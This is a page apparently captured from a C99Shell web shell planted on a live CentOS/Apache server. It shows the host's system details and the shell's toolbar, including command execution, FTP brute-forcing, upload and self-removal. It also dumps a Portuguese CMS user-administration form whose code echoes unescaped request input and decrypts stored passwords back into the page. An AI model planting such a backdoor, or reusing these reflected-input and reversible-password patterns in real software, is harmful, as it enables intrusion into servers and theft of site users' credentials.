!C99Shell v.2.1 [PHP 7 Update] [1.12.2019]!

Software: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16. PHP/5.4.16 

uname -a: Linux roko-bkp 3.10.0-1160.102.1.el7.x86_64 #1 SMP Tue Oct 17 15:42:21 UTC 2023 x86_64 

uid=48(apache) gid=48(apache) groups=48(apache),1003(webmaster) 

Safe-mode: OFF (not secure)

/var/www/html/site/ipanel/view/   drwxr-xr-x
Free 9.26 GB of 93.48 GB (9.9%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     formUsuario.php (6.43 KB)      -rwxr-xr-x
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php 
/* * ***************************************************************************************************
 *                                                                                                    *
 *                              Arquivo de Controle Geral                                             *
 *                            Desenvolvido por Agência Studio iMAXIS                                  *
 *                                                                                                    *
 * *************************************************************************************************** */

if (!class_exists('Data'))
    require_once(
APP_PATH "/util/Data.php");
$data = new Data();

if (!
class_exists('Util'))
    require_once(
APP_PATH "/util/Util.php");
$util = new Util();

if (!
class_exists('Password'))
    require_once(
APP_PATH "/system/Password.php");
$password = new Password();

if (
$this->controlClass == "GenericCtrl") {
    
$control = new GenericCtrl($this->getArea());
} else {
    
$control = new $this->controlClass;
}
if (!empty(
$_GET['id'])) {
    
$object $control->getObject($_GET['id']);
} else {
    
$object = new Usuario();
    
$collection = new Doctrine_Collection("Permissao");
    
$object->permissoes $collection;
}
?>
<script src="../js/ajax.js" type="text/javascript"></script>
<script type="text/javascript" language="javascript" src="../js/lytebox.js"></script>
<link rel="stylesheet" href="css/lytebox.css" type="text/css" media="screen"/>
<div class="lt" style="padding-bottom:0px!important;">
    <div class="lt_topo">
        <div class="lt_menu_topo form_top">
            <h1><?=  $this->getCurrentTitle() ?></h1>
            <ul>
                Formulário de inclusão / edição de usuário.
                <div class="clear"></div>
            </ul>
            <div class="clear"></div>
        </div>
    </div>
    <div class="stage_formulario">

        <form action="../app/cms/processa.php?lc=<?=  $this->getArea() ?><?=  $this->getParameters($_GET?>" enctype="multipart/form-data" method="post" name="formreg" id="formreg">
            <input type="hidden" name="id" value="<?=  $_GET['id'?>" />
            <input type="hidden" name="action" value="User" />
            <input type="hidden" name="tipoSubmit" value="" />

            <div class="box_forms">
                <div class="inputs_form">

                    <div class="title_forms">
                        <span class="sptl">Atenção! Os campos em <strong>negrito</strong> são obrigatórios.<br/>
                            Clique em <strong>Confirmar</strong> após preencher corretamente o formulário abaixo para salvar o registro atual.</span>
                        <br/><br/>
                        <a title="Listar Registros" href="?lc=<?=  $this->getArea() ?>&md=Lista<?=  $this->getParameters($_GET?>" class="bt_azul">Retornar a Lista</a>
                    </div>

                    <div class="sptl_fieldname">
                        <strong>Nome:</strong>
                    </div>
                    <div class="input_field">
                        <input id="nome" class="fields_form_medium" size="11" value="<?=  $object['nome'?>" name="nome">
                    </div>
                    <div class="sptl_fieldname">
                        <strong>Status:</strong>
                    </div>
                    <div class="input_field">
                        <select id="status" class="fields_form_select" name="status">
                            <?php  if(empty($_GET['id'])){ ?>
                                <option selected value="">Selecione</option>
                            <?php ?>
                            <option value="A" <?php   if($object['status'] == "A") print "selected"?>>Ativo</option>
                            <option value="I" <?php   if($object['status'] == "I") print "selected"?>>Inativo</option>
                        </select>
                    </div>
                    <div class="sptl_fieldname">
                        <strong>Email:</strong>
                    </div>
                    <div class="input_field">
                        <input id="email" class="fields_form_medium" size="11" value="<?=  $object['email'?>" name="email">
                    </div>
                    <div class="sptl_fieldname">Telefone:</div>
                    <div class="input_field">
                        <input id="telefone" class="fields_form_medium" size="11" value="<?=  $util->formatarTelefone($object['telefone']) ?>" name="telefone">
                    </div>
                    <div class="sptl_fieldname">
                        <strong>Login:</strong>
                    </div>
                    <div class="input_field">
                        <input id="login" class="fields_form_medium" size="11" value="<?=  $object['login'?>" name="login">
                    </div>
                    <div class="sptl_fieldname">
                        <strong>Senha:</strong>
                    </div>
                    <div class="input_field">
                        <input id="senha" class="fields_form_medium" type="password" maxlength="200" size="25" value="<?=  $password->deCript($object['senha']) ?>" name="senha">
                    </div>
                </div>
            <ul> <span class="sptl" align="left"><strong>Permissões de Acesso</strong></span><div class="clear"></div></ul>
            <div class="inputs_form">

                <!-- INICIO FORM PERMISSÕES -->
<?php   $this->writeActionsForm($object['permissoes']) ?>
                <!-- FIM FORM PERMISSÕES -->

            </div>
            <div class="clear"></div>

            <ul> <span class="sptl" align="left"><strong><br/><br/><br/>Relatórios</strong></span><div class="clear"></div></ul>
            <div class="inputs_form">

                <!-- INICIO FORM PERMISSÕES -->
<?php   $this->writeActionsForm($object['permissoes'], "Report"?>
                <!-- FIM FORM PERMISSÕES -->

            </div>


            <div class="clear">
                <p class="right"><input name="Submit" type="Submit" class="bt_input" value="Confirmar" onclick="document.formreg.tipoSubmit.value= 'P'"/></p>
                <div class="clear"></div>
            </div>
    </div>
</form>
</div>
<div class="clear"></div>
</div>
<span class="stcl"></span> <span class="stcr"></span>
<div class="clear"></div>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v.2.1 [PHP 7 Update] [1.12.2019] maintained by KaizenLouie and updated by cermmik | C99Shell Github (MySQL update) | Generation time: 0.0037 ]--